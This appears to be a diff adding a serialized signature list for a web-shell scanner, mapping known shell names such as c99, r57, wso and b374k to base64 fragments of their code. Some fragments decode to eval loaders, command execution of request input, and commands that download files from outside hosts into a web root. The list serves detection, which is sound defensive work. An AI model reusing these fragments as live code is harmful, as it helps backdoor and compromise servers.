+s:20:"filesman[23][0][php]"; +s:64:"CYufy8yS3hrK1JTRGJPKyxKRVsxXFcnckpAI0AmLitrd1cJZG5SU0RiWW5QRUVMW"; +s:18:"indexer[0][0][asp]"; +s:64:"yTzh1MlY4b2hKWUMrYkZxSmtoeVc4bjJKSkNUYTdHN1oxYnowdmVLUE52dkJGdWV"; +s:18:"webroot[1][0][php]"; +s:64:"I8L29wdGlvbj5cclxuIjsNCiAgICB9DQogIH0NCiAgZWNobyAiPC9zZWxlY3Q+XH"; +s:22:"FaTaLisTiCz[0][0][php]"; +s:64:"AvZ3JlcC50eHQnLAonbG9jYXRlIGNvbmZpZy5waHAgZmlsZXMgPj4gL3RtcC9ncm"; +s:15:"r57[14][0][php]"; +s:64:"HpjMGRlCgokamFtZXMwYmFzdGVyID0gIjdYMTdlOXE0OHZEZjNlZlo3NkI2Y3hiW"; +s:16:"b374k[5][0][php]"; +s:64:"kb044andRQWRFVlcKVlkxckVQOVVqd1JkWG90ZERBdkFkRE40UEl0N0NGUG9xZjc"; +s:14:"fx0[3][0][php]"; +s:95:"bb:JF9fX19fKyspeyRfX19fWyRfX19fX109Y2hyKCggb3JkKCRfX19fWyRfX19fX10pLW9yZCgkX19fWyRfX19fX10pKQ=="; +s:14:"pas[0][0][php]"; +s:64:"XSk7DQogICAgICAgIGVjaG8gIjwvdGV4dGFyZWE+IjsgICAgZGllKCk7DQogICAg"; +s:19:"gscshell[0][0][php]"; +s:64:"sICR1cGxvYWRmaWxlKSkgewogICAgZWNobyAi1ODp6+4g8/Hv5fjt7iDn4OPw8+b"; +s:21:"kadotshell[0][0][php]"; +s:64:"gICAgPHRkIHdpZHRoPSIyMTkiPg0KICAgICAgICA8Zm9udCBzaXplPSItMyIgZmF"; +s:15:"spam[3][0][php]"; +s:64:"IwTWpqcTBTdHJlcGZQWUozcW90dnkza3RLa083N2hWOXg2TC81UnU1a0lVRWJ2OD"; +s:15:"c99[13][0][php]"; +s:64:"eFM5K3h1dDIwUkVEYWZrQmFNaUR0SUNEdE1DRHR5S1BJdmw1RTZPeVdYM0RGZnZK"; +s:15:"c99[17][0][php]"; +s:64:"GFsbG93LGRlbnkKICAgIEFsbG93IGZyb20gYWxsCjwvRmlsZXM+CgojIE1ha2UgL"; +s:30:"htaccess_shell[0][0][htaccess]"; +s:64:"gPz8/Pz8/Pz8/PyBzaGVsbC0/Pz8/Pz8gKD8/Pz8/ID8/Pz8/Pz8sID8/Pz8/ID8"; +s:15:"c99[25][0][php]"; +s:64:"IHZhbHVlPSJFbnRlciI+CjwvdGQ+PC90cj4KJHRlbmQKSFRNTDsKCmlmIChpc3Nl"; +s:19:"kaushell[0][0][php]"; +s:64:"G9EMDBOTnJWT2ZOdFkreHF5N04zQWdmSVdia0s2ekkvY1lQZ3J1VnpXeksxNFJoO"; +s:20:"darkshell[1][0][php]"; +s:64:"gPHRkIHdpZHRoPSI1MCUiIGhlaWdodD0iMSIgdmFsaWduPSJ0b3AiIGJnY29sb3I"; +s:23:"stressbypass[1][0][php]"; +s:64:"yIFNlcnZlciBpbnRydXNpb248L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjE1IiA"; +s:18:"madspot[0][0][php]"; +s:64:"TTZpUkgzVUVQdDZzZC9ZcWFYYjhvbTAzeGJ1cUZNaW9QY3lVdktQNnZTUnpjcW1p"; +s:19:"filesman[0][0][php]"; +s:64:"NlIGYuYXR0cmlidXRlcw0KY2FzZSAwDQpGb2xkZXJBdHRyaWJ1dGVzID0gIk5vcm"; +s:22:"elmaliseker[0][0][vbs]"; +s:64:"hZDd4cS80NytiZ0lxT1MxdmZpcWd4amtzMEFENklIY2hkM3pVWDc5dnFwVFdlUzZ"; +s:15:"c99[20][0][php]"; +s:64:"Sis4a216YkxlbmZBenBHcTZlVitqdkdqdk84T0JNUnlaUTNyc3BtdCs1Ty9ZazBa"; +s:15:"r57[18][0][php]"; +s:64:"YWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwv"; +s:16:"telnet[1][0][pl]"; +s:64:"PScwNCc7IGJyZWFrOw0KCQkJCWNhc2UgJzUnOiAgJGRhdGU9JzA1JzsgYnJlYWs7"; +s:20:"foreverpp[0][1][php]"; +s:64:"aXplIl08JF9QT1NUWyJNQVhfRklMRV9TSVpFIl0pCiAgICB7CiAgICAgIGlmKG1v"; +s:22:"phpbackdoor[1][0][php]"; +s:64:"ZWxsPC90aXRsZT48bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRl"; +s:25:"antichat_shell[1][0][php]"; +s:64:"ZQ0KCQkJCVJlc3BvbnNlLldyaXRlICI8Zm9udCBmYWNlPSIiYXJpYWwiIiBzaXpl"; +s:21:"smartshell[0][0][asp]"; +s:64:"VkJyA9PiAiRGlzc2UgZmlsZXIgZXIga29waWVyZXQgdGlsIFwiWyUyXVwiOlxuWy"; +s:19:"webadmin[2][2][php]"; +s:64:"MGc1citqUWR6VGxrMndYaVcwd0h1aFBNeTJBR0NpTWsvek5CTDZrNXFWS0swSm5U"; +s:17:"b374k[17][0][php]"; +s:64:"PD9waHAKLypjODY0OWE5YTE2NTNmODUyODQzZjQ0ZjkxNmJjYjQ0ZCovaWYoaXNz"; +s:15:"cmd[14][0][php]"; +s:64:"FU3NVQ3QjJyRTI2OUd4cHBFdjZ3RG95YSsxdE5CdVVWUDRHV0FVL3ZveU14MVgxW"; +s:20:"phpshell[26][0][php]"; +s:64:"pIHsNCiAgICAgICAgcHJpbnQgIkZpbGU6Ii4gIGJhc2VuYW1lKCAkX0ZJTEVTWyd"; +s:20:"ironshell[1][0][php]"; +s:64:"NNWWpSN0lUZTQ0ZGtVc29IbnhEWWM4ZHlxcmJ2ZGJtaitqY285eWNWMmtrUkpHRk"; +s:22:"bogel_shell[1][0][php]"; +s:64:"iKSB7DQoJCQkkcmVzdWx0PXNoZWxsX2V4ZWMoJF9QT1NUWydjb21tYW5kJ10pOw0"; +s:15:"erne[2][0][php]"; +s:64:"IApOYW1lOjwvZm9udD48L2Rpdj4gCjwvdGQ+IAo8dGQgd2lkdGg9IjMxNyIgYm9y"; +s:24:"moroccan_spam[0][1][php]"; +s:64:"vZm9ybT48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPGJyPjxkaXYgY2xhc3M9YmFyaGV"; +s:23:"antisecshell[1][0][php]"; +s:64:"OQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa2NHdG1ORFZ"; +s:19:"cmos_clr[0][0][php]"; +s:64:"IDwvZm9udD4NCiAgICAgICAgICAgICAgPD9waHAgDQovLyBDaGVjayBmb3IgU2Fm"; +s:19:"s72shell[1][0][php]"; +s:64:"pOwogICAgJHVkID0gdXJsZW5jb2RlKCRkaXIpOwogICAgJHV2ID0gdXJsZW5jb2R"; +s:15:"c100[1][0][php]"; +s:64:"cmsgPSBTZXJ2ZXIuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0Lk5ldHdvcmsiKQoJCVNl"; +s:17:"rhtool[0][0][asp]"; +s:64:"8L3RkPicpOwoJCQkJCQlwKCc8dGQ+Jy4kcm93WydTZXFfaW5faW5kZXgnXS4nPC9"; +s:17:"phpspy[3][0][php]"; +s:64:"CBmb3JlYWNoICgkYWxsTGlua3MgYXMgJGtrID0+ICR2dil7ICRhbGxEbW5zW10gP"; +s:27:"brute_force_tool[0][0][php]"; +s:64:"fKC0oLChdKDorfCg6LV8oLCg6KDooXShdLCYoXyhfKGAtXigsKDooLihdKF0oXig"; +s:20:"phpshell[31][0][php]"; +s:64:"DBnaEJIRG5aK2lJREtGekdSeVRjZE5BWEd1ME05ekZuU0U3cWJFWUZneDdnR2owN"; +s:15:"c99[22][0][php]"; +s:64:"hc3MpKSB7CiAgICBpZihpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgKG1kNSgkX1B"; +s:14:"wso[4][0][php]"; +s:64:"LMmJobTEzQkNLdkJFZnptNUs1T0x2Y3pjQlFrTm5iT2pyZjlVcDY5VUJ3T094MC9"; +s:15:"r57[10][0][php]"; +s:64:"TMW8KNjNtMW4vc2FzZ25kWHpWTDRZRUFzUFVXZTZrZ3VpYVMxSGFIZFZDdAozaCs"; +s:19:"sec4ever[0][0][php]"; +s:64:"0Rmhzb0hsa3JsYUYwZ0V6K0dkaENFdENhQWlZaWNqU0tZV3NnV0tzUHVUTG9LTVR"; +s:25:"shell_uploader[6][0][php]"; +s:64:"VU8vNEtLazUvK3VJT1Nkc3hlOWJicGI5MFBPRmpCWm1nYnFsdmVOTk92a2wyVmlF"; +s:14:"wso[6][0][php]"; +s:64:"cyBhIGNvbnNlcXVlbmNlIG9mIHVzaW5nIHBlZXItdG8tcGVlciB0cmFuc21pc3Np"; +s:19:"filesman[2][0][php]"; +s:64:"0KaWYoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZmlsZSddKSl7ZmlsZV9wdXRfY29udG"; +s:17:"jackal[3][0][php]"; +s:64:"Mj4mbmJzcDsiLiR2YWx1ZXMuIiZuYnNwOzwvZm9udD48L3RkPjwvdHI+IjsNCiAg"; +s:14:"r57[7][0][php]"; +s:64:"c4Y0JGL3kiLCJmUW5FeFZCOCtENVdENXo4Um8iLCJ2Vjc4ODlkZmdRalFqaWhCLz"; +s:20:"phpshell[14][0][php]"; +s:64:"NzQ0LDMwLDM4NzEsMjYsMzI4Myw1MywyNDg1LDU0LDk1NDksNTUsODQ4Myw1OSwy"; +s:19:"webshell[1][0][php]"; +s:64:"AogYXJyYXkoIjxiPltTUUxdPC9iPiIsJHN1cmwuImFjdD1zcWwmZD0lZCIpLAogY"; +s:20:"phpshell[17][0][php]"; +s:64:"ICRsaW5lKQ0KICAgew0KICAgIGlmICghZW1wdHkoJGxpbmUpKQ0Kew0KZWNobyAi"; +s:15:"c99[10][0][php]"; +s:64:"5Q2dvZ2FXWW9KRjlRVDFOVVd5ZG1iM0p0WDJGamRHbHZiaWRkSUQwOUlERWdLUW9"; +s:18:"mrtiger[0][0][php]"; +s:64:"UtkdmpXVDU2R24rV2JJVkV6UUpsJywnb3Y5dk5iU2Z5ME15ZnFVVXQ2dHBGSycsJ"; +s:15:"empo[0][0][php]"; +s:64:"VhObE5qUmZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOWtaU0pkS1NrN0NuMD0nOyAKI"; +s:15:"cmd[25][0][php]"; +s:64:"LVWtySjlCbXB2cEozbWgvMm54OEZsMGY1YlRGOHgveXcwcEtXUlJDbytmZlVRdGV"; +s:15:"c99[14][0][php]"; +s:64:"pOUjBoNDRMdDI0TDFvYWwwcWIvZDQ0cVNocWw0M05PVW5uMnQyUXdEZkVrZHFxUj"; +s:20:"filesman[26][0][php]"; +s:64:"9BRi9Ed3ZZajQ2QWo4b0RJSUNORVBsTmNFUWtLR0FGZU55WlpoZEY3QnpaUlh3Yj"; +s:14:"wso[2][0][php]"; +s:64:"iIpKSB7IA0KICAgICAgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpIHsgDQogICAgI"; +s:20:"configspy[0][0][php]"; +s:64:"2V4ZWN1dGlvbl9tZXRob2QoKQp7CiAgICBpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc"; +s:20:"ironshell[3][0][php]"; +s:64:"seDRNV1Y2WWx4NE1UVmNlREExWEhnd1lWeDRNV1JjZURRd1ZWeDRNVFkzVVZoY2V"; +s:22:"joomla_spam[0][1][php]"; +s:64:"PD9waHAKLyplYzAxOTJiM2FlNjkyNDEwODlmNGI2YmQ1ZDY4NDg0NCovaWYoaXNz"; +s:15:"cmd[11][0][php]"; +s:64:"CcsICR0aGVzZT0nJykgLyogRXF1YWwgdG8gRHhVUkwoKSwgYnV0IHByaW50cyBvd"; +s:18:"dxshell[0][0][php]"; +s:64:"VFUMU5VV3lkd01pZGRMQ0FrZEdWdGNDa3BldzBLQ1FrSkNXVmphRzhnUUdacGJHV"; +s:19:"v0ld3m0r[1][0][php]"; +s:64:"ZWQgXCIkZmlsZVwiPGJyPiI7DQogICAgICAgICB9DQogICAgICAgIGVjaG8gIjxm"; +s:19:"safemode[5][0][php]"; +s:64:"ZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKSB7DQogICAgICBAb2Jfc3RhcnQo"; +s:22:"FaTaLisTiCz[3][0][php]"; +s:64:"SicsJ1JjQW4xS0hiRmVzOGFkeXVIOScsJ0hoVi81YkJFZFZHNTBzV3NlaycsJzM1"; +s:17:"noname[0][0][php]"; +s:64:"FuPSIzIj4mbmJzcDs8JT1lbnYucXVlcnlIYXNodGFibGUoIm9zLm5hbWUiKSU+ID"; +s:23:"jspwebshell[1][0][java]"; +s:64:"H0NCi5saXN0aW5nIHRoLnBlcm1pc3Npb24geyB0ZXh0LWFsaWduOiBsZWZ0IH0NC"; +s:19:"webadmin[5][2][php]"; +s:64:"qOG5TS0hXNzdqSUVOckRSZmtFOU9rZWFlUThwVVRJdFB3bEVOUHFoSXBVamw2T1l"; +s:14:"wso[8][0][php]"; +s:64:"1wOyBVc2VycyA8L3A+DQo8cCBjbGFzcz0ic3R5bGUxIj5CeXBhc3M8L3A+DQo8cC"; +s:17:"us3rspl[0][0][pl]"; +s:152:"+IGluZGV4LnBocCcpOw0KQGV4ZWMoJ2ZldGNoIC1vIGluZGV4LnBocCBodHRwOi8vaGJiYi5jb20uYXUvLi4uL2luLnR4dCcpOw0KQGV4ZWMoJ0dFVCBodHRwOi8vaGJiYi5jb20uYXUvLi4uL2luLnR"; +s:25:"shell_uploader[0][0][php]"; +s:64:"Glvbj0iP3k9PD9waHAgZWNobyAkcHdkOyA/PiZhbXA7eD11cGxvYWQiIGVuY3R5c"; +s:20:"m1n1shell[0][0][php]"; +s:64:"LVUJsZUdWaktDUmpiV1FwT3dvSlpXeHpaV2xtS0daMWJtTjBhVzl1WDJWNGFYTjB"; +s:26:"shell_uploader[14][0][php]"; +s:64:"zSGl1S1hNM1lia0U1b3lhcGRudElZOStqbkVBTnZHbzFpbmxDTXpkZis2c3BpUU5"; +s:20:"phpshell[20][0][php]"; +s:64:"z8/Pz8nLAoncnVfdGV4dDYnID0+Jz8/Pz8/Pz8/PyA/Pz8/JywKJ3J1X3RleHQ3J"; +s:14:"r57[5][0][php]"; +s:64:"ZiBuYW1lPSJ4cCI+DQoNCg0KPD9waHANCg0KDQogICAgICBpZiAoJF9HRVRbJ3Vz"; +s:17:"cpanel[0][0][php]"; +s:64:"IgdmFsdWU9IicuaHRtbHNwZWNpYWxjaGFycygkZmlsZSkuJyI+PGlucHV0IHR5cG"; +s:17:"cpanel[1][0][php]"; +s:64:"mhsaW5LKCJzZUM9aGV4JmZpbEU9JGZuJndvcmtpbmdkaVI9JGN3ZCIpLiJcIj5IZ"; +s:17:"jackal[2][0][php]"; +s:64:"NmJjYWI0NTMyZWI4NTRlIA0KJGNvbG9yID0gIiMwMEZGNjYiOwkvL0NvbG91cg0K"; +s:20:"filesman[11][0][php]"; +s:64:"6IEZBTFNFOyB9DQpmdW5jdGlvbiBnZXRkaXNmdW5jKCkgeyAkcmV6ID0gZXhwbG9"; +s:19:"ipays777[0][0][php]"; +s:64:"HdkWjRFL1lveFUwcm9QUFhjR0RGc3FEaGJiUWpSZVFiSW5sK0RzanJGZVAyMStqV"; +s:20:"phpshell[24][0][php]"; +s:64:"zIHdpdGggdXNlcjog3sfG4+Ugx+Hj5sfe2iDj2iDH0+Mg7ebS0cfK5cc8L2ZvbnQ"; +s:18:"symlink[0][0][php]"; +s:64:"lxuIjsNCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KDQoJZWNobyAiPC90YWJsZT4iO"; +s:16:"mysql[9][0][php]"; +s:64:"h0WFgyclFuZlBXcVZaMGVzSGltRHIyZGttKzV3YmpuajJqUnpvRmJaUnlMakVsQ2"; +s:20:"phpshell[25][0][php]"; +s:64:"TXBPdz09IjsgDQpldmFsKGJhc2U2NF9kZWNvZGUoJGluamJ1ZmYpKTsNCi8qIGN5"; +s:15:"wso[18][0][php]"; +s:64:"NGRkZGRkYiIG9uQ2xpY2s9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd0Y29sb3"; +s:20:"constance[0][0][php]"; +s:64:"7e46PGJyPjx0ZXh0YXJlYSByb3dzPTggY29scz04MD4iLmJhc2U2NF9lbmNvZGUo"; +s:19:"nixshell[0][0][php]"; +s:64:"IG91dHNldDsKQk9SREVSLUxFRlQ6ICAgIzk3QzI5NiAxcHggb3V0c2V0OwpCT1JE"; +s:14:"r57[1][0][php]"; +s:64:"jQCZ+LFBQNkdELGsnOH5PVyw6bTZAI0Amfn4sUH5QLH54bTpueEs0TGkyXldDTmN"; +s:16:"efso2[0][0][asp]"; +s:64:"1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddID0gc3RyX3JlcGxhY2UoICdcXCcsICcvJ"; +s:25:"phpfilemanager[5][0][php]"; +s:64:"V1k0ZlR1Qk9Sc29ab08yTzBYdWUrQVB3TkZXZXRCTU5WTW5DK0dsRGlhR0FkZWFL"; +s:20:"al-marhum[1][0][php]"; +s:64:"2alFGdTk3a1Y0STRabk1tTWtxQjdCemR3Vm9DblNZVGdETThZN0NmVHliUVNlM0d"; +s:20:"filesman[18][0][php]"; +s:64:"XJyb3IoIk5vIGNvbmZpZ3VyYXRpb24gZmlsZXMgZm91bmQhIik7CiAgICB9IGVsc"; +s:17:"teamps[0][0][php]"; +s:64:"wA/AD8APwAgAD8APwA/AD8APwA/AD8APwA/AD8APwAgACcAIwAnACkAIgAsAAANC"; +s:21:"remoteview[2][0][php]"; +s:64:"1ZT0zMj5BcmNoaXZlIikKcmVzcG9uc2Uud3JpdGUoIjxicj48aW5wdXQgdHlwZT1"; +s:22:"elmaliseker[1][0][vbs]"; +s:64:"25sb2FkXCI+PC9mb3JtPjwvZGl2PiI7CgoKCmVjaG8gIjxkaXY+PEZPUk0gbWV0a"; +s:19:"webshell[2][0][php]"; +s:64:"cE95QmxZMmh2SUNjOEwzUmxlSFJoY21WaFBpYzdmUTBLWldOb2J5QW5QR1p2Y20w"; +s:23:"simple_shell[0][0][php]"; +s:64:"npsaWI6Ly8iLiRmaWxlLCAkdGVtcCkpewokenJvZGxvID0gZm9wZW4oJHRlbXAsI"; +s:19:"safemode[0][0][php]"; +s:64:"BjbTVOTTFBdlJrSldhSEpRDQpUemxzTmtsMGIzbDBNSGxvWjJzcldIa3ZWMGR3Tk"; +s:17:"sempak[0][0][php]"; +s:64:"NEaFpBclJpSjMvK09SRWY0K21QajQxWEViNkUxTjVvT3ZmcFoxajFtU241bHp2Vl"; +s:25:"shell_uploader[2][0][php]"; +s:64:"CiAgICAlPiA8L2ZvbnQ+PC9kaXY+CiAgICAgIDwvdGQ+CiAgICA8L3RyPgogICAg"; +s:26:"powerdreamshell[0][0][asp]"; +s:64:"IlVuYXNzaWduZWQiOwoKJHBvcnRbNjFdID0gIk5JIE1BSUwiOwoKJHBvcnRbNjJd"; +s:29:"networkfilemanager[0][0][php]"; +s:64:"qcUpYRVJ3V1JzaTJ5c3VMV0ExdFhxbXdNMmxGaERVOWdrcWlhRHNubEo3dExGYjJ"; +s:15:"r57[12][0][php]"; +s:194:"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZm"; +s:15:"cmd[13][0][php]"; +s:64:"uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQ0KCQk"; +s:19:"cgitelnet[0][0][pl]"; +s:64:"Wx0Yi9ldnZubXFuNHQvOURFNHAwdmRYL3Z0a012MS9wViBlICIuIngiLiIrIi4ie"; +s:19:"filesman[6][0][php]"; +s:64:"QxMDcnPT4nx+Hj5tbm2icsDQonZW5nX2J1dHQxNSc9PifF0dPH4ScsDQonZW5nX3"; +s:22:"snipershell[2][0][php]"; +s:64:"kY7CiAgYmFja2dyb3VuZDogI0YwMDsKfQoKLmVudHJpZXMgewogIGJvcmRlcjogM"; +s:20:"gammashell[0][0][pl]"; +s:64:"Hh0Jyk7DQpleGVjKCdjZCAvdG1wO0dFVCBodHRwOi8vbGV0dG9yZS5wbC9maWxlL"; +s:25:"shell_uploader[7][0][php]"; +s:64:"lhYmxlIE5hbWU8L0I+PC9mb250PjwvcD4KICAgICAgPC9URD4KICAgIDxURCB3aW"; +s:20:"variables[0][0][asp]"; +s:64:"GxvYWRlZF9maWxlKCRfRklMRVNbJ3Byb2JlJ11bJ3RtcF9uYW1lJ10sICIuL2Rpb"; +s:19:"nccshell[0][0][php]"; +s:64:"ktMTsKICAgJGV4dCA9ICRleHRbJGNdOwogICAkZXh0ID0gc3RydG9sb3dlcigkZX"; +s:19:"phpshell[6][0][php]"; +s:64:"TGhWT2pGIiwiZE9jZlFpY2NIY0Y5MTZvOXNIOGdKbngxTmNSZWNxVzJvcXMvUXlH"; +s:25:"shell_uploader[3][0][php]"; +s:64:"0VSVkVSWydIVFRQX0hPU1QnXS4iL1wiPmh0dHA6Ly8iLkAkX1NFUlZFUlsnSFRUU"; +s:20:"phpshell[28][0][php]"; +s:64:"Ym90dG9tbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIw"; +s:17:"sincap[0][0][php]"; +s:64:"ICAgICAgdHJ5OgogICAgICAgICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0"; +s:20:"cgi-python[0][0][py]"; +s:64:"HOGlhU3p0aHJXemhUSnU4c2k1SWk3ODUrdnZrSllMb2V1OGJydktoZzFiZVFNVTN"; +s:14:"cmd[6][0][php]"; +s:64:"ZUUHoyQXRKVHBkTVFTU1NlRzh6QzVyaGhQd09td3E1aytoVHRpWWFQVExBSXdXS2"; +s:20:"configspy[4][0][php]"; +s:64:"ZyBzID0gc3RtcmRyLlJlYWRUb0VuZCgpOw0Kc3RtcmRyLkNsb3NlKCk7DQpyZXR1"; +s:16:"cmd[17][0][aspx]"; +s:64:"2V7IHVuc2V0KCRvWHlhcW1Ib0NodkhRRkN2VGx1cW1BQ1snaW5mbyddWydmYWlsJ"; +s:28:"wordpress_exploit[0][0][php]"; +s:64:"NzYWdlKTsKfQprcklSKEFYU2JiLlZhbHVlKTsKfQpwdWJsaWMgdm9pZCBnTEtjKH"; +s:20:"qReyFuRt[0][0][aspx]"; +s:64:"CI8Zm9udCBzaXplPScxJyBjb2xvcj0nIzk5OTk5OSc+RG9udCBpbiB3aW5kb3dzI"; +s:22:"simattacker[0][0][php]"; +s:64:"W9temZ2SmpxVlZFZ3R1Z21EeUEwYm1CWDFwUVNBOUlEanE4b0hteVp3TTlnc2JnV"; +s:15:"c99[28][0][php]"; +s:64:"YWJsZXMoICRkYm5hbWUgKTsNCg0KCWlmKCAkcFRhYmxlID09IDAgKSB7DQoJCSRt"; +s:16:"mysql[8][0][php]"; +s:64:"OVCBDT0xPUj1SRUQ+Y21kOjwvRk9OVD4nLiR0Yi0+bWFrZXNlbGVjdChhcnJheSg"; +s:16:"tryag[0][0][php]"; +s:64:"A6ICRkaXNmdW5jPTApOw0KKHN0cnRvdXBwZXIoc3Vic3RyKFBIUF9PUywgMCwgMy"; +s:21:"fatalshell[1][0][php]"; +s:64:"NlLnB3ZCI+RmluZCBzZXJ2aWNlLnB3ZCBmaWxlcyBpbiBjdXJyZW50IGRpcmVjdG"; +s:14:"c99[5][0][php]"; +s:64:"ktPcnhUVS9LUWV2USIsImxGd0NmVW9kc1Y2enhwM0s0ZjBlRlgvbHNFIiwiUjFVY"; +s:20:"phpshell[13][0][php]"; +s:64:"IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojMDogTm8gcHJvdGVjdGlvbjsgYW55"; +s:20:"g00nshell[0][0][php]"; +s:64:"T4KPHRyPgogIDx0ZCB3aWR0aD0iNTAlIiBoZWlnaHQ9IjgzIiB2YWxpZ249InRvc"; +s:18:"wacking[1][0][php]"; +s:64:"1lLdys3VDVQVndOekhYU3FPanl1TDFjRHhNeGczdDdYM2NUQ2FTeld0VEFVSC8rZ"; +s:18:"mildnet[0][0][php]"; +s:64:"HQ9MSB2YWxpZ249dG9wPjxUQUJMRSBoZWlnaHQ9MSBjZWxsU3BhY2luZz0wIGNlb"; +s:19:"gnyshell[1][0][php]"; +s:64:"cm1zWyJ3Il1bInIiXT8iIGNoZWNrZWQiOiIiKS4iPiBSZWFkPGJyPlxuIi4NCiAg"; +s:22:"FaTaLisTiCz[6][0][php]"; +s:64:"iIHN0eWxlPSJmb250LXNpemU6MTBwdCI+PGI+U2FmZSBNb2RlIE9OPC9iPjwvZm9"; +s:20:"rootshell[1][0][php]"; +s:547:"bb:XHg2NVx4NzZceDYxXHg2Q1x4MjhceDY3XHg3QVx4NjlceDZFXHg2Nlx4NkNceDYxXHg3NFx4NjVceDI4XHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NVx4MjgnN1gxcmU5czJ6L0RuOVZjd21qZlpxK1BZVHR1N3MyTW5hUTV0MmpUcGN1Z3A2ZVBKc214cmtTMVBrdU5rV2Y3N0M0Q2tSRXF5NDNTNzM4TjF2YnVmcDdGSUVBUkprQVJCQUhUN3hSVm5OSWx1aTRYTzZkN0p4NzJUQy9QTjJkbUh6amw4ZGJaZjd4MmRtZDlLSlhiSEN0UFFDYllIempnS1dZdFpRV0RkRm8zWHZqL3dIS1BNakZOdkdrend4L3ZUbzFkK2hMOWNxMk1GOXRDOWRnTDgvR0tOZTg0Ti9qcXhSbDBQRWt0TjV2YUxrOEFaZEVaV1pBK0w1cHJKS3N3ZFRUeS81eFROdjgyeVdtMEo4c3cxRnhNZm9IWG9XRDBuS0Y="; +s:19:"filesman[5][0][php]"; +s:64:"m91cDwvYj4iO30NCiAgICAgICRyb3dbXSA9ICI8Yj5QZXJtczwvYj4iOw0KICAgI"; +s:22:"FaTaLisTiCz[2][0][php]"; +s:64:"2PSRfUkVRVUVTVFsnc3VibWl0diddOw0KJG1ldGhvZD0kX1JFUVVFU1RbJ21ldGh"; +s:21:"cybershell[1][0][php]"; +s:64:"ycpLm9uKCdmb2N1cycsIGZ1bmN0aW9uKGUpewoJCWFyZ3MgPSAkKCcjZXZhbEFyZ"; +s:17:"b374k[15][0][php]"; +s:64:"R0dBNy9oZGp4YlkwZWhCWndFTFloOTYwaUlDNUt4SFhEQXBKVUYvMHNDSFp5cXJi"; +s:16:"b374k[1][0][php]"; +s:64:"jEpLiIrJHZiNGE4ODQxN1xuIjsgfSB9IGZ1bmN0aW9uIG5lNjY3ZGE3Nigkdjk1N"; +s:20:"phpshell[29][0][php]"; +s:64:"SkhrV1NPL1VMNFA2UStrV1ZiMDRDM0RNL0h3anpmMkJMTUxybno0ZElWc0lqMics"; +s:20:"phpshell[12][0][php]"; +s:64:"gICcsCidydV9idXR0MycgPT4nICAgICAgICcsCidydV90ZXh0MTInPT4nYmFjay1"; +s:15:"r57[15][0][php]"; +s:64:"uRFVQQ2VQSHBwck5ya2g3NzRMRFJ4RXZMYmhNVEY5WEpVdVBGa3paSlhZeVZCaVh"; +s:15:"cbot[0][0][php]"; +s:64:"JTEVTWydpbWFnZSddWyduYW1lJ107ICR1c2VyZmlsZV90bXAgPSAkX0ZJTEVTWyd"; +s:26:"shell_uploader[19][0][php]"; +s:64:"CAgICAgICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgICAgIHsKICAgI"; +s:16:"devil[0][0][php]"; +s:64:"WFrOwoKICAgIGNhc2UgImd6ZGVjb2RlIjoKICAgICAgaWYgKGlzX2ZpbGUoJFBhd"; +s:19:"sroshell[0][0][php]"; +s:64:"mQ29yMHFxSERidDZiMFVtRVl4TkViZEMrQnMxOHRmeExkU1B4RU1ScWJkQm9rTGY"; +s:26:"shell_commander[0][0][php]"; +s:64:"pqOE1FYU9ZTU84TUJXOUQwTDRadko5M21ZYXNjWVhQblVIYmJWM1hMR0IveHJiek"; +s:17:"b374k[16][0][php]"; +s:64:"pbmdkaW5ncyAzIiBzaXplPSI1Ij48L2ZvbnQ+PGI+QnlwYXNzIFNoZWxsIEt1bGx"; +s:19:"safemode[6][0][php]"; +s:64:"laWYoc3RydG9sb3dlcigkY21kKSA9PSAiYWJvdXQiKQoJCXsKCQkJcHJpbnQgIkF"; +s:29:"ajax_command_shell[0][0][php]"; +s:139:"bb:XHgyMFw1Mlx4MmZcNDBceDY1XDE2Nlx4NjFcMTU0XHgyOFwxNjNceDc0XDE2Mlx4NWZcMTYyXHg2NVwxNjBceDZjXDE0MVx4NjNcMTQ1XHgyOFwxNDNceDY4XDE2Mlx4MjhcNTA="; +s:20:"phpshell[27][0][php]"; +s:64:"WbWRsUjA1Q2NrczJkVU41U20wd1oycFZXazFzWkV4TE9GRkJTM00yWmtwWGFHUnR"; +s:26:"shell_uploader[18][0][php]"; +s:64:"ibt9NNQqxwQADsAPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCdJR1ZqYUc4Z0lud"; +s:15:"cmd[12][0][php]"; +s:64:"mNtUndjbVZ6Y3k1MGVIUW5LVHNOQ2lBZ0lDQnplVzFzYVc1cktDY3ZhRzl0WlM4b"; +s:21:"buckethead[0][0][php]"; 